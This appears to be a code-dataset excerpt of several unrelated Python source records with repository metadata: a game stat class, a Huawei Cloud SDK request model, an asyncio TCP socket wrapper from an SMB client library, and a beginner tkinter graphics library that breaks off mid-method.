self.__max = getattr(self.parent, "_{}".format(max))
self._construire()
def __getnewargs__(self):
return ("", "", "", 0, "")
def __repr__(self):
return "<stat {}={}>".format(self.nom, self.courante)
def __str__(self):
return "{}={} (base={}, variable={}, max={})".format(
self.nom, self.courante, self.base, self.variable, self.max)
@property
def base(self):
return self.__base
def _get_variable(self):
return self.__variable
def _set_variable(self, variable):
self.__variable = variable
variable = property(_get_variable, _set_variable)
@property
def max(self):
max = self.__max
if max:
max = max.courante
return max
def _get_courante(self):
return self.__base + self.__variable
def _set_courante(self, courante):
"""C'est dans cette propriété qu'on change la valeur courante
de la stat.
On passe par une méthode 'set' qui fait le travail.
"""
self.set(courante, self.flags)
courante = property(_get_courante, _set_courante)
def set(self, courante, flags):
"""Modifie la stat courante.
C'est dans cette méthode qu'on lève des exceptions en fonction des
valeurs modifiées.
NOTE IMPORTANTE: la valeur est modifiée quelque soit l'exception
levée. L'exception est levée pour réagir à un certain comportement
(par exemple, le joueur n'a plus de vitalité) mais elle n'empêchera
pas la stat d'être modifiée.
En revanche, on test bel et bien que la stat de base ne dépasse ni
le max ni la marge.
"""
base = courante - self.__variable
if self.parent and self.parent.parent and \
not self.parent.parent.est_immortel():
# Raising exceptions
if base < 0 and flags & I0:
self.__base = 0
raise StatI0
if base <= 0 and flags & IE0:
self.__base = 0
raise StatIE0
if self.max and flags & SM and base > self.max:
raise StatSM
if self.max and flags & SEM and base >= self.max:
raise StatSEM
if base > self.marge_max:
base = self.marge_max
if base < self.marge_min:
base = self.marge_min
if self.max and base > self.max:
base = self.max
if self.parent and self.parent.parent and \
self.parent.parent.est_immortel() and self.max:
base = self.max
self.__base = base
def __setattr__(self, nom, val):
BaseObj.__setattr__(self, nom, val)
| [
"[email protected]"
] | |
eebaf1cc5939bf3397f44b7abae4b3301b3f9927 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-cc/huaweicloudsdkcc/v3/model/update_network_instance_request_body.py | ccb6925b1dca4650bfa9c81651ceef569cd52c3e | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 3,407 | py | # coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UpdateNetworkInstanceRequestBody:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'network_instance': 'UpdateNetworkInstance'
}
attribute_map = {
'network_instance': 'network_instance'
}
def __init__(self, network_instance=None):
"""UpdateNetworkInstanceRequestBody
The model defined in huaweicloud sdk
:param network_instance:
:type network_instance: :class:`huaweicloudsdkcc.v3.UpdateNetworkInstance`
"""
self._network_instance = None
self.discriminator = None
self.network_instance = network_instance
@property
def network_instance(self):
"""Gets the network_instance of this UpdateNetworkInstanceRequestBody.
:return: The network_instance of this UpdateNetworkInstanceRequestBody.
:rtype: :class:`huaweicloudsdkcc.v3.UpdateNetworkInstance`
"""
return self._network_instance
@network_instance.setter
def network_instance(self, network_instance):
"""Sets the network_instance of this UpdateNetworkInstanceRequestBody.
:param network_instance: The network_instance of this UpdateNetworkInstanceRequestBody.
:type network_instance: :class:`huaweicloudsdkcc.v3.UpdateNetworkInstance`
"""
self._network_instance = network_instance
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UpdateNetworkInstanceRequestBody):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
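# Usage sketch (added; UpdateNetworkInstance is the companion model from the
# same SDK package, not imported in this module, and its constructor
# arguments are omitted here as an assumption):
#   body = UpdateNetworkInstanceRequestBody(network_instance=instance)
#   print(body.to_dict())  # serializes nested models recursively
#   print(body)            # __repr__ delegates to to_str() (JSON output)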
| [
"[email protected]"
] | |
6ff299c2cc6c8b9893253d3ebe9d3ea491400c72 | 60be3894ad491bde502b8f6909a026ee115d952e | /aiosmb/network/tcp.py | 3da2e5cbc315e7cbcfde7804212c83c4942ef225 | [] | no_license | topotam/aiosmb | 7c97c6a9806c84a9fae28fa372cc6903fa6ec0c5 | e2ece67bbf380f576b154b09ea5fd63d9b4ecf4c | refs/heads/master | 2023-06-25T17:41:03.605226 | 2021-07-27T18:31:12 | 2021-07-27T18:31:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,676 | py | import enum
import asyncio
from aiosmb import logger
from aiosmb.commons.exceptions import *
class TCPSocket:
"""
Generic asynchronous TCP socket class, nothing SMB related.
Creates the connection and channels incoming/outgoing bytes via asynchronous queues.
"""
def __init__(self, socket = None, target = None):
self.settings = target
self.socket = socket #for future use, if we want a custom socket
self.reader = None
self.writer = None
self.out_queue = asyncio.Queue()
self.in_queue = asyncio.Queue()
self.disconnected = asyncio.Event()
self.incoming_task = None
self.outgoing_task = None
async def disconnect(self):
"""
Disconnects from the socket.
Stops the reader and writer streams.
"""
if self.disconnected.is_set():
return
if self.outgoing_task is not None:
self.outgoing_task.cancel()
if self.incoming_task is not None:
self.incoming_task.cancel()
if self.writer is not None:
try:
self.writer.close()
except:
pass
self.writer = None
self.reader = None
self.disconnected.set()
async def handle_incoming(self):
"""
Reads data bytes from the socket and dispatches it to the incoming queue
"""
try:
lasterror = None
msgsize = None
while not self.disconnected.is_set():
try:
data = await self.reader.readexactly(4)
msgsize = int.from_bytes(data[1:], byteorder='big', signed = False)
data = await self.reader.readexactly(msgsize)
await self.in_queue.put( (data, None) )
if data == b'':
return
except asyncio.CancelledError as e:
lasterror = e
break
except Exception as e:
logger.debug('[TCPSocket] handle_incoming %s' % str(e))
lasterror = e
break
except asyncio.CancelledError:
return
except Exception as e:
lasterror = e
finally:
if self.in_queue is not None:
await self.in_queue.put( (None, lasterror) )
await self.disconnect()
async def handle_outgoing(self):
"""
Reads data bytes from the outgoing queue and dispatches it to the socket
"""
try:
while not self.disconnected.is_set():
data = await self.out_queue.get()
self.writer.write(data)
await self.writer.drain()
except asyncio.CancelledError:
#the SMB connection is terminating
return
except Exception as e:
logger.exception('[TCPSocket] handle_outgoing %s' % str(e))
await self.disconnect()
#async def connect(self, settings): #not needed parameter because we have networkselector now...
async def connect(self):
"""
Main function to be called, connects to the target specified in settings, and starts reading/writing.
"""
#self.settings = settings
try:
con = asyncio.open_connection(self.settings.get_ip(), self.settings.get_port())
try:
self.reader, self.writer = await asyncio.wait_for(con, int(self.settings.timeout))
except asyncio.TimeoutError:
logger.debug('[TCPSocket] Connection timeout')
raise SMBConnectionTimeoutException('[TCPSocket] Connection timeout')
except ConnectionRefusedError:
logger.debug('[TCPSocket] Connection refused')
raise SMBConnectionRefusedException('[TCPSocket] Connection refused')
except asyncio.CancelledError:
#the SMB connection is terminating
raise asyncio.CancelledError
except Exception as e:
logger.debug('[TCPSocket] connect generic exception')
raise e
self.incoming_task = asyncio.create_task(self.handle_incoming())
self.outgoing_task = asyncio.create_task(self.handle_outgoing())
return True, None
except Exception as e:
try:
self.writer.close()
except:
pass
return False, e
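# Usage sketch (added for illustration; `target` stands for a settings object
# exposing get_ip(), get_port() and timeout, as used by connect() above):
#   sock = TCPSocket(target=target)
#   ok, err = await sock.connect()
#   await sock.out_queue.put(payload)      # queue raw bytes to send
#   data, err = await sock.in_queue.get()  # one length-prefixed message
#   await sock.disconnect()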
| [
"[email protected]"
] | |
c61c925a0e0f9a7e7cfb8f89789e3bb008228a43 | f55ea1cfc520e6e2ceda961e7400fe2de0ad4e69 | /src/rosegraphics.py | c2138ca1fdd9002c0686a7fb42372f18f779db0e | [
"MIT"
] | permissive | chenx16/05b-Exam1Practice | 231081cc1284ccdd27b1da57cd19bc656a648eb1 | 82dbe6a5677732820f32dbb8264c04a028a1a459 | refs/heads/master | 2020-04-09T20:15:08.721532 | 2018-12-12T19:01:54 | 2018-12-12T19:01:54 | 160,568,393 | 0 | 0 | null | 2018-12-05T19:31:56 | 2018-12-05T19:31:56 | null | UTF-8 | Python | false | false | 65,517 | py | """
rosegraphics.py - a simple Graphics library for Python.
Its key feature is:
-- USING this library provides a simple introduction to USING objects.
Other key features include:
-- It has a rich set of classes, methods and instance variables.
-- In addition to classes like Circles that are natural for
students, it has other kinds of classes like RoseWindow
and FortuneTeller to provide a richer set of examples
than "just" a graphics library.
-- It allows one to do a reasonable set of graphics operations
with reasonable efficiency. The API mimics Java's Shape API
for the most part.
-- It is built on top of tkinter and its extension ttk
(the standard graphics libraries that come with Python).
-- Unlike tkinter, it is NOT event-driven and hence can be used
before students see that paradigm. (There is a behind-the-scenes
facilty for listening for and responding to events,
for those who want to do so.)
-- It attempts to be as bullet-proof as possible, to make it easy
for beginners to use it. In particular, it attempts to provide
reasonable error messages when a student misuses the API.
-- It was inspired by zellegraphics but is a complete re-implementation
that attempts to:
-- Be more bullet-proof.
-- Provide a richer set of examples for using objects.
-- Have an API that is more like Java's Shape API than tkinter's
(older) API.
-- While it can serve as an example for defining classes,
it is NOT intended to do so for beginners.
It is excellent for helping students learn to USE objects;
it is NOT perfect for helping students learn to WRITE CLASSES.
See the MAIN function below for typical examples of its use.
Authors: David Mutchler, Mark Hays, Michael Wollowswki, Matt Boutell,
Chandan Rupakheti, Claude Anderson and their colleagues,
with thanks to John Zelle for inspiration and hints.
First completed version: September 2014.
"""
# FIXME (errors):
# -- clone() does not really make a copy; it just makes a new one
# but without cloning all the attributes.
# -- _ShapeWithCenter claims that things like Ellipse are subclasses,
# but they are not at this point, I think. In general, need to
# deal with overlap between _ShapeWithCenter and _RectangularShape.
# KEEP both of them to have some classes have corner_1 and corner_2
# while others have center and ...
# FIXME (things that have yet to be implemented):
# -- Allow multiple canvasses.
# -- Better close_on ... ala zellegraphics.
# -- Keyboard.
# -- Better Mouse.
# -- Add type hints.
# -- Catch all Exceptions and react appropriately.
# -- Implement unimplemented classes.
# -- Add and allow FortuneTellers and other non-canvas classes.
import tkinter
from tkinter import font as tkinter_font
import time
import turtle
# ----------------------------------------------------------------------
# All the windows that are constructed during a run share the single
# _master_Tk (a tkinter.Tk object)
# as their common root. The first construction of a RoseWindow
# sets this _master_Tk to a Tkinter.Tk object.
# ----------------------------------------------------------------------
_master_Tk = None
# ----------------------------------------------------------------------
# At the risk of not being Pythonic, we provide a simple type-checking
# facility that attempts to provide meaningful error messages to
# students when they pass arguments that are not of the expected type.
# ----------------------------------------------------------------------
class WrongTypeException(Exception):
""" Not yet implemented. """
pass
def check_types(pairs):
""" Not yet implemented fully. """
for pair in pairs:
value = pair[0]
expected_type = pair[1]
if not isinstance(value, expected_type):
raise WrongTypeException(pair)
# ----------------------------------------------------------------------
# Serialization facility
# ----------------------------------------------------------------------
def _serialize_shapes(self):
"""Returns a list of strings representing the shapes in sorted order."""
# Idea: dump all the stats on all shapes, return a sorted list for easy comparison.
# Problem: the order in which keys appear in dictionaries is random!
# Solution: sort keys and manually print
shapes = [shape.__dict__ for shape in self.initial_canvas.shapes]
keys_by_shape = [sorted(shape) for shape in shapes]
for k in range(len(shapes)):
shapes[k]['_method_for_drawing'] = None
shapes[k]['shape_id_by_canvas'] = None
result = []
for k in range(len(keys_by_shape)):
shape = shapes[k]
result.append([])
for key in keys_by_shape[k]:
result[-1].append(str(key) + ":" + str(shape[key]))
result[-1] = str(result[-1])
return "\n".join(sorted(result))
# ----------------------------------------------------------------------
# RoseWindow is the top-level object.
# It starts with a single RoseCanvas.
# ----------------------------------------------------------------------
class RoseWindow(object):
"""
A RoseWindow is a window that pops up when constructed.
It can have RoseWidgets on it and starts by default with
a single RoseCanvas upon which one can draw shapes.
To construct a RoseWindow, use:
- rg.RoseWindow()
or use any of its optional arguments, as in these examples:
window = rg.RoseWindow(400, 300) # 400 wide by 300 tall
window = rg.RoseWindow(400, 300, 'Funny window') # with a title
Instance variables include:
width: width of this window (in pixels)
height: width of this window (in pixels)
title: displayed on the window's bar
widgets: the things attached to this window
"""
def __init__(self, width=400, height=300, title='Rose Graphics',
color='black', canvas_color=None,
make_initial_canvas=True):
"""
Pops up a tkinter.Toplevel window with (by default)
a RoseCanvas (and associated tkinter.Canvas) on it.
Arguments are:
-- width, height: dimensions of the window (in pixels).
-- title: title displayed on the windoww.
-- color: background color of the window
-- canvas_color: background color of the canvas
displayed on the window by default
-- make_initial_canvas:
-- If True, a default canvas is placed on the window.
-- Otherwise, no default canvas is placed on the window.
If this is the first RoseWindow constructed, then a
hidden Tk object is constructed to control the event loop.
Preconditions:
:type width: int
:type height: int
:type title: str
:type color: Color
:type canvas_color: Color
:type make_initial_canvas: bool
"""
# check_types([(width, (int, float)),
# (height, (int, float)),
# (title, (Color, str)
# --------------------------------------------------------------
# The _master_Tk controls the mainloop for ALL the RoseWindows.
# If this is the first RoseWindow constructed in this run,
# then construct the _master_Tk object.
# --------------------------------------------------------------
global _master_Tk
if not _master_Tk:
_master_Tk = tkinter.Tk()
_master_Tk.withdraw()
else:
time.sleep(0.1) # Helps the window appear on TOP of Eclipse
# --------------------------------------------------------------
# Has a tkinter.Toplevel, and a tkinter.Canvas on the Toplevel.
# --------------------------------------------------------------
self.toplevel = tkinter.Toplevel(_master_Tk,
background=color,
width=width, height=height)
self.toplevel.title(title)
self._is_closed = False
self.toplevel.protocol("WM_DELETE_WINDOW", self.close)
# FIXME: The next two need to be properties to have
# setting happen correctly. Really belongs to RoseCanvas.
# See comments elsewhere on this.
self.width = width
self.height = height
if make_initial_canvas:
self.initial_canvas = RoseCanvas(self, width, height,
canvas_color)
else:
self.initial_canvas = None
self.widgets = [self.initial_canvas]
# FIXME: Do any other tailoring of the toplevel as desired,
# e.g. borderwidth and style...
# --------------------------------------------------------------
# Catch mouse clicks and key presses.
# --------------------------------------------------------------
self.mouse = Mouse()
self.keyboard = Keyboard()
self.toplevel.bind('<Button>', self._on_mouse_click)
self.toplevel.bind('<KeyPress>', self._on_key_press)
self.update()
def close(self):
""" Closes this RoseWindow. """
if self.toplevel:
self.toplevel.destroy()
self.toplevel = None
self.update()
self._is_closed = True
def update(self):
"""
Checks for and handles events that have happened
in this RoseWindow (e.g. mouse clicks, drawing shapes).
"""
global _master_Tk
_master_Tk.update()
def render(self, seconds_to_pause=None):
"""
Updates all the Shapes attached to RoseCanvas objects associated with this RoseWindow, then draws all those Shapes.
After doing so, pauses the given number of seconds.
:type seconds_to_pause: float
"""
for widget in self.widgets:
if type(widget) == RoseCanvas:
widget.render()
self.update()
if seconds_to_pause:
time.sleep(seconds_to_pause)
def close_on_mouse_click(self):
"""
Displays a message at the bottom center of the window and waits for the user to click the mouse anywhere in the window.
Then closes this RoseWindow.
Returns an rg.Point that specifies where the user clicked the mouse.
"""
message = 'To exit, click anywhere in this window'
click_position = self.continue_on_mouse_click(message=message,
close_it=True)
return click_position
def continue_on_mouse_click(self,
message='To continue, click anywhere in this window',
x_position=None,
y_position=None,
close_it=False,
erase_it=True):
"""
Displays a message at the bottom center of the window and waits for the user to click the mouse, then erases the message.
Optional parameters let you:
-- Display a different message
-- Place the message at a different place in the window (xpos and ypos are as in Text)
-- Close the window after the mouse is clicked (and ignore the GraphicsError that results if the user instead chooses to click the X in the window)
-- NOT erase the message when done
"""
if self._is_closed:
return
if x_position is None:
x_position = self.width / 2
if y_position is None:
y_position = self.height - 20
anchor_point = Point(x_position, y_position)
text = Text(anchor_point, message)
# FIXME: Really should do all this on a per-RoseCanvas basis.
if self.initial_canvas:
text.attach_to(self.initial_canvas)
self.initial_canvas._renderShape(text, render_NOW=True)
click_position = self.get_next_mouse_click()
if erase_it and self.initial_canvas:
text.detach_from(self.initial_canvas)
if close_it:
self.close() # then close the window
return click_position
def get_next_mouse_click(self):
"""
Waits for the user to click in the window.
Then returns the rg.Point that represents the point where the user clicked.
Example:
If this method is called and then the user clicks near the upper-right corner of a 300 x 500 window,
this method would return something like rg.Point(295, 5).
"""
self.mouse.position = None
while True:
if self._is_closed:
return None
if self.mouse.position is not None:
break
self.update()
time.sleep(.05) # allow time for other events to be handled
click_point = self.mouse.position
self.mouse.position = None
return click_point
def _on_mouse_click(self, event):
self.mouse._update(event)
def _on_key_press(self, event):
self.keyboard._update(event)
# def add_canvas(self, width=None, height=None, background_color=0):
# FIXME: Set defaults based on the main canvas.
# new_canvas = RoseCanvas(self, background_color='white')
# self.widgets.append(new_canvas)
#
# _root.update()
def __serialize_shapes(self):
"""Returns a list of strings representing the shapes in sorted order."""
return _serialize_shapes(self)
class RoseWidget():
"""
A Widget is a thing that one can put on a Window,
e.g. a Canvas, FortuneTeller, etc.
"""
def __init__(self, window):
self._window = window
def get_window(self):
return self._window
class RoseCanvas(RoseWidget):
defaults = {'colors': [None, 'yellow', 'light blue', 'dark grey']}
count = 0
"""
A RoseCanvas is a RoseWidget (i.e., a thing on a RoseWindow)
upon which one can draw shapes and other Drawable things.
"""
def __init__(self, window, width=200, height=200,
background_color=0):
super().__init__(window)
RoseCanvas.count = RoseCanvas.count + 1
# FIXME: Deal with default background colors.
# FIXME: Store background color as a property
# so that modifying it changes the tkinter canvas.
# Ditto width and height.
# if background_color == 0:
# index = RoseCanvas.count % len(defaults['colors'])
# self.background_color = defaults['colors'][index]
# else:
# self.background_color = background_color
tk_canvas = tkinter.Canvas(window.toplevel,
width=width, height=height,
background=background_color)
self._tkinter_canvas = tk_canvas
# FIXME: Automate gridding better.
self._tkinter_canvas.grid(padx=5, pady=5)
self.shapes = []
def render(self, seconds_to_pause=None):
"""
Updates all the Shapes attached to this RoseCanvas, then draws all those Shapes.
After doing so, pauses the given number of seconds.
:type seconds_to_pause: float
"""
self._update_shapes()
self._window.update()
if seconds_to_pause:
time.sleep(seconds_to_pause)
def _renderShape(self, shape, render_NOW=False):
"""Renders a shape."""
coordinates = shape._get_coordinates_for_drawing()
options = shape._get_options_for_drawing()
if shape.shape_id_by_canvas[self] is None:
shape.shape_id_by_canvas[self] = \
shape._method_for_drawing(self._tkinter_canvas, *coordinates)
try:
self._tkinter_canvas.coords(shape.shape_id_by_canvas[self],
*coordinates)
except tkinter.TclError:
msg = 'Could not place the shape\n'
msg += 'on the given window.\n'
msg += 'Did you accidentally close a window\n'
msg += 'that later needed to be rendered again?'
raise Exception(msg) from None
self._tkinter_canvas.itemconfigure(shape.shape_id_by_canvas[self],
options)
if render_NOW:
# redraw NOW
self._window.update()
def _draw(self, shape):
"""Queues a shape for being drawn. Does NOT draw it just yet."""
shapeInList = False
for listShape in self.shapes:
if listShape is shape:
shapeInList = True
break
if not shapeInList:
shape.shape_id_by_canvas[self] = None
self.shapes.append(shape)
def _undraw(self, shape):
if shape in self.shapes:
for i in range(len(self.shapes)):
if self.shapes[i] is shape:
self._tkinter_canvas.delete(shape.shape_id_by_canvas[self])
del self.shapes[i]
break
def _update_shapes(self):
for shape in self.shapes:
self._renderShape(shape)
class Mouse(object):
def __init__(self):
self.position = None
def _update(self, event):
self.position = Point(event.x, event.y)
class Keyboard(object):
def __init__(self):
self.key_pressed = None
def _update(self, event):
pass
class __FreezeClass__ (type):
"""Prevents class variable assignment."""
def __setattr__(self, name, _ignored): # last parameter is the value
err = "You tried to set the instance variable '" + name + "'\n"
err += " on the CLASS '" + self.__name__ + "'"
err += ", which is not an OBJECT.\n"
err += " Did you forget the () after the word "
err += self.__name__ + ",\n"
err += " on the line where you constructed the object?"
raise SyntaxError(err)
class _Shape(object, metaclass=__FreezeClass__):
"""
A Shape is a thing that can be drawn on a RoseCanvas
(which itself draws on a tkinter Canvas).
Its constructor provides the tkinter method to be used to
draw this Shape.
This abstract type has concrete subclasses that include:
Arc, Bitmap, Circle, Ellipse, Image, Line, Path, Polygon,
Rectangle, RoundedRectangle, Square, Text and Window.
Public data attributes: None.
Public methods: attach_to.
"""
def __init__(self, method_for_drawing):
""" Arguments:
-- the tkinter method for drawing the Shape.
"""
self._method_for_drawing = method_for_drawing
self.shape_id_by_canvas = {}
def __eq__(self, other):
"""
Two Shape objects are equal (==) if all their attributes
are equal to each other.
"""
# check before we go deleting keys that may or may not exist
if(not isinstance(other, self.__class__)):
return False
self_dict = self.__dict__.copy()
other_dict = other.__dict__.copy()
del self_dict["shape_id_by_canvas"]
del other_dict["shape_id_by_canvas"]
return (self_dict == other_dict)
def __ne__(self, other):
return not self.__eq__(other)
def attach_to(self, window_or_canvas):
"""
'draws' this Shape. More precisely:
Attaches this Shape to the given
RoseWindow or RoseCanvas. When that
RoseWindow/RoseCanvas is rendered, this shape
will appear on that RoseWindow/RoseCanvas.
"""
if isinstance(window_or_canvas, RoseWindow):
window_or_canvas = window_or_canvas.initial_canvas
window_or_canvas._draw(self)
def detach_from(self, rose_canvas):
"""
'undraws' this Shape. More precisely:
Detaches this Shape from the given
RoseWindow or RoseCanvas. When that
RoseWindow/RoseCanvas is rendered,
this shape will no longer appear
on that RoseWindow/RoseCanvas.
"""
if isinstance(rose_canvas, RoseWindow):
rose_canvas = rose_canvas.initial_canvas
rose_canvas._undraw(self)
class _ShapeWithOutline(object):
"""
A Shape that has an interior (which can be filled with a color)
and an outline (which has a color and thickness).
This abstract type has concrete subclasses that include:
Arc, Circle, Ellipse, Image,
Polygon, Rectangle, Square, Text and Window.
Public data attributes: fill_color, outline_color, outline_thickness.
Public methods: _initialize_options.
"""
defaults = {'fill_color': None,
'outline_color': 'black',
'outline_thickness': 1}
def _initialize_options(self):
self.fill_color = _ShapeWithOutline.defaults['fill_color']
self.outline_color = _ShapeWithOutline.defaults['outline_color']
self.outline_thickness = _ShapeWithOutline.defaults[
'outline_thickness']
def _get_options_for_drawing(self):
options = {'fill': self.fill_color,
'outline': self.outline_color,
'width': self.outline_thickness}
# If a color is None, that means transparent here:
for option in ('fill', 'outline'):
if not options[option]:
options[option] = ''
return options
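# Illustrative sketch of the None -> '' translation above: a shape whose
# fill_color is None yields {'fill': '', 'outline': 'black', 'width': 1},
# and tkinter treats the empty string as "draw nothing" (transparent).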
class _ShapeWithThickness(object):
"""
A Shape that can be (and almost always is) filled with a color
and has a thickness but no outline.
This abstract type has concrete subclasses that include:
Line and Path.
Public data attributes: color, thickness.
Public methods: _initialize_options.
"""
defaults = {'color': 'black',
'thickness': 1,
'arrow': None}
def _initialize_options(self):
self.color = _ShapeWithThickness.defaults['color']
self.thickness = _ShapeWithThickness.defaults['thickness']
self.arrow = _ShapeWithThickness.defaults['arrow']
def _get_options_for_drawing(self):
options = {'fill': self.color,
'width': self.thickness,
'arrow': self.arrow}
# If a color is None, that means 'black' here:
if options['fill'] is None:
options['fill'] = 'black'
return options
class _ShapeWithText(object):
"""
A Shape that has text and a font for displaying that text.
This abstract type has concrete subclasses that include:
Text.
Public data attributes: font_family, font_size,
is_bold, is_italic, is_underline, is_overstrike.
Public methods: _initialize_options.
"""
# FIXME: Add more to the above docstring.
defaults = {'font_family': 'helvetica',
'font_size': 14,
'weight': 'normal',
'slant': 'roman',
'underline': 0,
'overstrike': 0,
'justify': tkinter.CENTER,
'text_box_width': None,
'text_color': 'black',
'text': ''}
def _initialize_options(self):
self.font_family = _ShapeWithText.defaults['font_family']
self.font_size = _ShapeWithText.defaults['font_size']
self.is_bold = _ShapeWithText.defaults['weight'] == 'bold'
self.is_italic = _ShapeWithText.defaults['slant'] == 'italic'
self.is_underline = _ShapeWithText.defaults['underline'] == 1
self.is_overstrike = _ShapeWithText.defaults['overstrike'] == 1
self.justify = _ShapeWithText.defaults['justify']
self.text_box_width = _ShapeWithText.defaults['text_box_width']
self.text_color = _ShapeWithText.defaults['text_color']
self.text = _ShapeWithText.defaults['text']
def _get_options_for_drawing(self):
weight = 'bold' if self.is_bold else 'normal'
slant = 'italic' if self.is_italic else 'roman'
underline = 1 if self.is_underline else 0
overstrike = 1 if self.is_overstrike else 0
font = tkinter_font.Font(family=self.font_family,
size=self.font_size,
weight=weight,
slant=slant,
underline=underline,
overstrike=overstrike)
options = {'font': font,
'justify': self.justify,
'fill': self.text_color,
'text': self.text}
if self.text_box_width:
options['width'] = self.text_box_width
return options
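# Illustrative sketch: with is_bold=True and is_italic=False, the options
# built above include a Font(weight='bold', slant='roman'), i.e. the boolean
# flags are translated into tkinter's font keywords at draw time.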
class _ShapeWithCenter(_Shape):
"""
A Shape that has a center (and for which moving its center
moves the entire Shape). Its constructor provides the center
of the Shape along with its method for drawing this Shape.
This abstract type has concrete subclasses that include:
Arc, Bitmap, Circle, Ellipse, Image,
Rectangle, RoundedRectangle, Square, Text and Window.
Public data attributes: center.
Public methods: move_by, move_center_to.
"""
def __init__(self, center, method_for_drawing):
"""
Arguments:
-- the Point that is the center of the Shape
(the Shape stores a CLONE of that Point)
-- the tkinter method for drawing the Shape.
"""
# Clone the center argument, so that if the caller
# mutates the argument, it does NOT affect this Shape.
super().__init__(method_for_drawing)
self.center = center.clone()
def move_by(self, dx, dy):
"""
Moves this _Shape to the right by dx and down by dy.
Negative values move it to the left/up instead.
Does NOT return a value; instead, it mutates this shape.
:type dx: float
:type dy: float
"""
self.center.move_by(dx, dy)
def move_center_to(self, x, y):
"""
Moves this _Shape's center to (x, y),
thus translating the entire Shape
by however much its center moved.
:type x: float
:type y: float
"""
self.center.move_to(x, y)
class _RectangularShape(_Shape):
"""
A _Shape determined by its rectangular bounding box (plus possibly
other information).
Concrete sub-classes include: rg.Ellipse, rg.Rectangle.
Examples:
These all assume that the variable shape is a _RectangularShape
(e.g. an rg.Ellipse or a rg.Rectangle):
The methods in these examples all return rg.Point objects that are
copies of a corner/center of the _RectangularShape:
ul = shape.get_upper_left_corner()
ur = shape.get_upper_right_corner()
ll = shape.get_lower_left_corner()
lr = shape.get_lower_right_corner()
center = shape.get_center()
The methods in these examples return a positive number:
h = shape.get_height()
w = shape.get_width()
The method in this example returns an rg.Rectangle that encloses
this _RectangularShape:
bbox = shape.get_bounding_box()
This example moves this _RectangularShape right 100 and up 50:
shape.move_by(100, -50)
This example does the same thing another way,
by mutating the two corner Points directly:
shape.corner_1.move_by(100, -50)
shape.corner_2.move_by(100, -50)
"""
def __init__(self, corner_1, corner_2, method_for_drawing):
"""
:type corner_1: Point
:type corner_2: Point
:type method_for_drawing: callable(int, int, int, int) -> int
"""
super().__init__(method_for_drawing)
self.corner_1 = corner_1.clone()
self.corner_2 = corner_2.clone()
self._update_corners()
def __repr__(self):
""" Returns a string representation of this shape. """
f_string = ''
f_string += '{}: corner_1=({}, {}), corner_2=({}, {}),'
f_string += ' fill_color={},'
f_string += ' outline_color={}, outline_thickness={}.'
return f_string.format(self.__class__.__name__,
self.corner_1.x, self.corner_1.y,
self.corner_2.x, self.corner_2.y,
self.fill_color, self.outline_color,
self.outline_thickness)
def move_by(self, dx, dy):
"""
Moves this _Shape to the right by dx and down by dy.
Negative values move it to the left/up instead.
Does NOT return a value; instead, it mutates this shape.
:type dx: float
:type dy: float
"""
self.corner_1.x += dx
self.corner_1.y += dy
self.corner_2.x += dx
self.corner_2.y += dy
def clone(self):
"""
Returns a copy of this _RectangularShape.
"""
return self.__class__(self.corner_1.clone(),
self.corner_2.clone())
def get_upper_left_corner(self):
"""
Returns a copy of the ** upper-left **
corner of this _RectangularShape.
The returned value is an rg.Point.
"""
self._update_corners()
return self._upper_left_corner
def get_lower_left_corner(self):
"""
Returns a copy of the ** lower-left **
corner of this _RectangularShape.
The returned value is an rg.Point.
"""
self._update_corners()
return self._lower_left_corner
def get_upper_right_corner(self):
"""
Returns a copy of the ** upper-right **
corner of this _RectangularShape.
The returned value is an rg.Point.
"""
self._update_corners()
return self._upper_right_corner
def get_lower_right_corner(self):
"""
Returns a copy of the ** lower-right **
corner of this _RectangularShape.
The returned value is an rg.Point.
"""
self._update_corners()
return self._lower_right_corner
def get_center(self):
"""
Returns a copy of the ** center ** of this _RectangularShape.
The returned value is an rg.Point.
"""
return Point((self.corner_1.x + self.corner_2.x) / 2,
(self.corner_1.y + self.corner_2.y) / 2)
def get_height(self):
"""
Returns the height (i.e., the size in
the y-direction) of this _RectangularShape.
The returned value is always positive.
"""
return abs(self.corner_1.y - self.corner_2.y)
def get_width(self):
"""
Returns the width (i.e., the size in
the x-direction) of this _RectangularShape.
The returned value is always positive.
"""
return abs(self.corner_1.x - self.corner_2.x)
def get_bounding_box(self):
"""
Returns an rg.Rectangle that encloses this _RectangularShape.
"""
return Rectangle(self.corner_1, self.corner_2)
def _update_corners(self):
min_x = min(self.corner_1.x, self.corner_2.x)
min_y = min(self.corner_1.y, self.corner_2.y)
max_x = max(self.corner_1.x, self.corner_2.x)
max_y = max(self.corner_1.y, self.corner_2.y)
self._upper_left_corner = Point(min_x, min_y)
self._upper_right_corner = Point(max_x, min_y)
self._lower_left_corner = Point(min_x, max_y)
self._lower_right_corner = Point(max_x, max_y)
def _get_coordinates_for_drawing(self):
